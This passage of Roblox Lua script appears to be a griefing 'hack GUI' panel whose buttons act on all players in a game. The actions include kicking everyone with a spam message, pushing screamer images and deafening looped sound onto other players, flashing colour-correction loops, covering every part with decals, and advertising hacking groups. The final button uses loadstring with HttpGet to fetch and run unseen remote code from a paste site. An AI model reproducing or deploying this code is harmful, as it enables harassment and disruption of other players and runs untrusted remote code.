	        for i, v in pairs(game.Players:GetChildren()) do	
	            emit = Instance.new("ParticleEmitter")	
	            emit.Parent = v.Character.Head	
	            emit.Texture = "http://www.roblox.com/asset/?id=118841245164962"	
	            emit.VelocitySpread = 999999999999999999999999999999999	
	        end	
	    end)	
	end	
	
	script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_d);
local function C_f()
	local script = LMG2L["LocalScript_f"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	local sky = Instance.new("Sky")	
	        sky.Parent = game.Lighting	
	        for _, face in pairs({"Bk", "Dn", "Ft", "Lf", "Rt", "Up"}) do	
	            sky["Skybox"..face] = "rbxassetid://121648159358932"	
	        end	
	
	end)	
end;
task.spawn(C_f);
local function C_11()
	local script = LMG2L["LocalScript_11"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	     for _, player in pairs(game.Players:GetPlayers()) do	
	            player:Kick("join bebuos42 today kick all ERROR (1001)")	
	        end	
	
	end)	
end;
task.spawn(C_11);
local function C_15()
	local script = LMG2L["LocalScript_15"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	 for i,v in pairs(game.Players:GetChildren()) do	
	         if v.Character:FindFirstChild("Head") then	
	            gui1=Instance.new("BillboardGui")	
	            gui1.Parent = v.Character.Head	
	            gui1.Adornee = v.Character.Head	
	            gui1.Size=UDim2.new(2.5,0,2.5,0)	
	            gui1.StudsOffset=Vector3.new(0,0.2,0)	
	            gui1.AlwaysOnTop = true	
	            text1=Instance.new("ImageLabel")	
	            text1.Image = "rbxassetid://106913761939358"	
	            text1.Size=UDim2.new(1,0,1,0)	
	            text1.Position=UDim2.new(0,0,0,0)	
	            text1.BackgroundTransparency = 1	
	            text1.Parent=gui1	
	            v.Character.Head.Transparency = 1	
	         end	
	      end	
	
	s = Instance.new("Sky")	
	s.Name = "SKY"	
	s.SkyboxBk = "http://www.roblox.com/asset/?id=95360019654007"	
	s.SkyboxDn = "http://www.roblox.com/asset/?id=95360019654007"	
	s.SkyboxFt = "http://www.roblox.com/asset/?id=95360019654007"	
	s.SkyboxLf = "http://www.roblox.com/asset/?id=95360019654007"	
	s.SkyboxRt = "http://www.roblox.com/asset/?id=95360019654007"	
	s.SkyboxUp = "http://www.roblox.com/asset/?id=95360019654007"	
	s.Parent = game.Lighting	
	
	    local l = Instance.new("ColorCorrectionEffect", game.Lighting)	
	      l.Contrast, l.Saturation, l.Brightness = 200, 200, 0.420	
	      l.TintColor = Color3.new(1, 0, 0)	
	   	
	      local running = true	
	      while running do	
	         l.Contrast = math.random(150, 250) -- Randomize contrast between 150 and 250	
	         l.Saturation = math.random(150, 250) -- Randomize saturation between 150 and 250	
	         l.Brightness = math.random(10, 50) / 100 -- Randomize brightness between 0.1 and 0.5	
	         l.TintColor = Color3.fromHSV(math.random(), 2,2) -- Randomize tint color	
	   	
	         wait(0.2)	
	      end	
	
	end)	
end;
task.spawn(C_15);
local function C_17()
	local script = LMG2L["LocalScript_17"];
	function click()	
	-- Rainbow Disco Script for Roblox	
	-- Place this script in ServerScriptService	
	local Lighting = game:GetService("Lighting")	
	local TweenService = game:GetService("TweenService")	
	-- Settings	
	local changeSpeed = 1 -- Color change speed (in seconds)	
	local colors = {	
	Color3.fromRGB(255, 0, 0), -- Red	
	Color3.fromRGB(255, 127, 0), -- Orange	
	Color3.fromRGB(255, 255, 0), -- Yellow	
	Color3.fromRGB(0, 255, 0), -- Green	
	Color3.fromRGB(0, 0, 255), -- Blue	
	Color3.fromRGB(75, 0, 130), -- Indigo	
	Color3.fromRGB(148, 0, 211) -- Violet	
	}	
	local currentColorIndex = 10	
	-- Function to change color	
	local function changeColor()	
	while true do	
	currentColorIndex = currentColorIndex % #colors + 1	
	local nextColor = colors[currentColorIndex]	
	-- Create tween for smooth transition	
	local tweenInfo = TweenInfo.new(	
	changeSpeed,	
	Enum.EasingStyle.Linear,	
	Enum.EasingDirection.InOut	
	)	
	local goal = {	
	Ambient = nextColor,	
	OutdoorAmbient = nextColor,	
	ColorShift_Top = nextColor	
	}	
	local tween = TweenService:Create(Lighting, tweenInfo, goal)	
	tween:Play()	
	wait(changeSpeed)	
	end	
	end	
	-- Start the effect	
	spawn(changeColor)	
	    end	
	    	
	    script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_17);
local function C_19()
	local script = LMG2L["LocalScript_19"];
	function onClick()	
	        Instance.new("Sound").Parent = game.Workspace  game.Workspace.Sound.SoundId ="rbxassetid://1839246774" game.Workspace.Sound.Looped=true  game.Workspace.Sound:Play()	
	    end	
	    	
	    script.Parent.MouseButton1Down:connect(onClick)	
end;
task.spawn(C_19);
local function C_1b()
	local script = LMG2L["LocalScript_1b"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	local sky = Instance.new("Sky")	
	        sky.Parent = game.Lighting	
	        for _, face in pairs({"Bk", "Dn", "Ft", "Lf", "Rt", "Up"}) do	
	            sky["Skybox"..face] = "rbxassetid://118841245164962"	
	        end	
	
	end)	
end;
task.spawn(C_1b);
local function C_1d()
	local script = LMG2L["LocalScript_1d"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	s = Instance.new("Sky")	
	s.Name = "SKY"	
	s.SkyboxBk = "http://www.roblox.com/asset/?id=95983668193386"	
	s.SkyboxDn = "http://www.roblox.com/asset/?id=95983668193386"	
	s.SkyboxFt = "http://www.roblox.com/asset/?id=95983668193386"	
	s.SkyboxLf = "http://www.roblox.com/asset/?id=95983668193386"	
	s.SkyboxRt = "http://www.roblox.com/asset/?id=95983668193386"	
	s.SkyboxUp = "http://www.roblox.com/asset/?id=95983668193386"	
	s.Parent = game.Lighting	
	
	  local l = Instance.new("ColorCorrectionEffect", game.Lighting)	
	      l.Contrast, l.Saturation, l.Brightness = 200, 200, 0.420	
	      l.TintColor = Color3.new(1, 0, 0)	
	   	
	      local running = true	
	      while running do	
	         l.Contrast = math.random(150, 250) -- Randomize contrast between 150 and 250	
	         l.Saturation = math.random(150, 250) -- Randomize saturation between 150 and 250	
	         l.Brightness = math.random(10, 50) / 100 -- Randomize brightness between 0.1 and 0.5	
	 	
	         wait(0.2)	
	      end	
	
	end)	
end;
task.spawn(C_1d);
local function C_20()
	local script = LMG2L["LocalScript_20"];
	function click()	
	local msg = Instance.new("Message")	
	msg.Parent = workspace	
	msg.Text = "team coolkidd join today! hacking"	
	wait(3)	
	msg:Destroy()	
	end	
	
	    script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_20);
local function C_22()
	local script = LMG2L["LocalScript_22"];
	function onClick()	
	        Instance.new("Sound").Parent = game.Workspace  game.Workspace.Sound.SoundId ="rbxassetid://1839246711" game.Workspace.Sound.Looped=true  game.Workspace.Sound:Play()	
	    end	
	    	
	    script.Parent.MouseButton1Down:connect(onClick)	
end;
task.spawn(C_22);
local function C_24()
	local script = LMG2L["LocalScript_24"];
	function click()	
	local h = Instance.new("Hint")	
	h.Parent = Workspace 	
	h.Text = "🫲🤛hello world join bebuos42 kacking map🤜🫱 "	
	wait(9999999999999)	
	h:Remove()	
	end	
	
	    script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_24);
local function C_26()
	local script = LMG2L["LocalScript_26"];
	function click()	
	script.Parent.MouseButton1Click:Connect(function()	
	        for i,v in pairs(game.Players:GetPlayers()) do	
	            if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then	
	                spawn(function()	
	                    local newgui = Instance.new("ScreenGui",v.PlayerGui)	
	                    newgui.Name = "Screamer"	
	                    local newimage = Instance.new("ImageLabel",newgui)	
	                    newimage.Image = "http://www.roblox.com/asset/?id=121648159358932"	
	                    newimage.Size = UDim2.new(1,1,1,1)	
	                    local s = Instance.new("Sound",newgui)	
	                    s.SoundId = "rbxassetid://0"	
	                    s.Volume = 9999999999999999999999999999999999999	
	                    s.Looped = true	
	                    s:Play()	
	                    print("Screamed "..v.Name)	
	                    while wait(9) do	
	                        	
	                        newimage.Parent:Destroy()	
	                        	
	                    end	
	                end)	
	            end	
	        end	
	    end)	
	end	
	
	script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_26);
local function C_28()
	local script = LMG2L["LocalScript_28"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	    while true do	
	        for _, part in pairs(workspace:GetDescendants()) do	
	            if part:IsA("BasePart") then	
	                part.Color = Color3.new(math.random(), math.random(), math.random())                	
	            end            	
	        end        	
	        wait(2)   	
	    end	
	
	end)	
end;
task.spawn(C_28);
local function C_2b()
	local script = LMG2L["LocalScript_2b"];
	function click()	
	local msg = Instance.new("Message")	
	msg.Parent = workspace	
	msg.Text = "team koopkidd join today! hacking"	
	wait(3)	
	msg:Destroy()	
	end	
	
	    script.Parent.MouseButton1Down:connect(click)	
end;
task.spawn(C_2b);
local function C_2d()
	local script = LMG2L["LocalScript_2d"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	for _, v in pairs(game:GetDescendants()) do	
	            if v:IsA("Part") or v:IsA("MeshPart") or v:IsA("Character") then	
	                for _, face in pairs(Enum.NormalId:GetEnumItems()) do	
	                    local decal = Instance.new("Decal")	
	                    decal.Texture = "rbxassetid://121648159358932"	
	                    decal.Face = face	
	                    decal.Parent = v	
	                end	
	            end	
	        end	
	
	end)	
end;
task.spawn(C_2d);
local function C_30()
	local script = LMG2L["LocalScript_30"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	local sky = Instance.new("Sky")	
	        sky.Parent = game.Lighting	
	        for _, face in pairs({"Bk", "Dn", "Ft", "Lf", "Rt", "Up"}) do	
	            sky["Skybox"..face] = "rbxassetid://122763754628141"	
	        end	
	
	Spooky = Instance.new("Sound", game.Workspace)	
	Spooky.Name = "Spooky"	
	Spooky.SoundId = "rbxassetid://1847661821"	
	Spooky.Volume = 20	
	Spooky.Looped = true	
	Spooky:Play()	
	
	for _, v in pairs(game:GetDescendants()) do	
	            if v:IsA("Part") or v:IsA("MeshPart") or v:IsA("Character") then	
	                for _, face in pairs(Enum.NormalId:GetEnumItems()) do	
	                    local decal = Instance.new("Decal")	
	                    decal.Texture = "rbxassetid://122763754628141"	
	                    decal.Face = face	
	                    decal.Parent = v	
	                end	
	            end	
	        end	
	
	-- MLG Particles Script By ItsKittyyyGD	
	
	-- no skid this skidders	
	
	game.Players.PlayerAdded:Connect(function(player)	
	    player.CharacterAdded:Connect(function(character)	
	        local torso = character:FindFirstChild("Torso") or character:FindFirstChild("UpperTorso")	
	        if torso then	
	            local fe = Instance.new("ParticleEmitter", torso)	
	            fe.Texture = "rbxassetid://122763754628141"	
	            fe.VelocitySpread = 50	
	        end	
	    end)	
	end)	
	
	for _, player in pairs(game.Players:GetPlayers()) do	
	    if player.Character then	
	        local torso = player.Character:FindFirstChild("Torso") or player.Character:FindFirstChild("UpperTorso")	
	        if torso then	
	            local fe = Instance.new("ParticleEmitter", torso)	
	            fe.Texture = "rbxassetid://122763754628141"	
	            fe.VelocitySpread = 50	
	        end	
	    end	
	end	
	
	end)	
end;
task.spawn(C_30);
local function C_32()
	local script = LMG2L["LocalScript_32"];
	local button = script.Parent	
	button.MouseButton1Click:Connect(function()	
	loadstring(game:HttpGet("https://pastefy.app/jzXgQVtv/raw"))()	
	
	end)	
end;
task.spawn(C_32);

return LMG2L["ScreenGui_1"], require;
